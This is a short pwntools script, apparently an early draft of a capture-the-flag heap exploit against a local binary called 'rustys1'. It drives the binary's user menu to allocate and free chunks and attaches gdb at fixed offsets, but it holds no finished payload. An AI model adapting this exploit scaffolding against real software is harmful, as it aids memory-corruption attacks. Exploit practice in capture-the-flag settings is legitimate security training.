from pwn import *def new_user(firstname, lastname = "last", address = "addr"

1. from pwn import *
2.  
3. def new_user(firstname, lastname = "last", address = "addr"):
4.  
5. p.recvuntil('Choice: ')
6. p.sendline('0')
7.  
8. p.recvuntil('Choice: ')
9. p.sendline('0')
10. p.recvuntil('First Name: ')
11. p.sendline(firstname)
12.  
13. p.recvuntil('Choice: ')
14. p.sendline('1')
15. p.recvuntil('Last Name: ')
16. p.sendline(lastname)
17.  
18.  
19. p.recvuntil('Choice: ')
20. p.sendline('2')
21. p.recvuntil('Address: ')
22. p.sendline(address)
23.  
24. return
25.  
26.  
27. def edit_user(val, idx):
28.  
29. p.recvuntil('Choice: ')
30. p.sendline('2')
31.  
32. p.recvuntil('Choice: ')
33. p.sendline(str(idx))
34.  
35. p.recvuntil(': ')
36. p.sendline(val)
37.  
38. return
39.  
40.  
41. def delete_user(idx):
42.  
43. p.recvuntil('Choice: ')
44. p.sendline('3')
45.  
46. p.recvuntil('User: ')
47. p.sendline(str(idx))
48.  
49. return
50.  
51. def list_users():
52.  
53. p.recvuntil('Choice: ')
54. p.sendline('2')
55.  
56. return
57.  
58. def pwn():
59.  
60. new_user('A'*0x60)
61. new_user('B'*0x60)
62.  
63. delete_user(0)
64.  
65. p.interactive()
66.  
67. p = process('./rustys1')
68. base = p.libs()['/root/Downloads/rustys/rustys1']
69.  
70. gdb.attach(p, '''
71. b * {addr1}
72. b * {addr2}
73. c
74. '''.format(addr1=0x1a41 + base, addr2=0x1a65 + base, addr3=0x190b + base, addr4=0x1708))
75. pwn()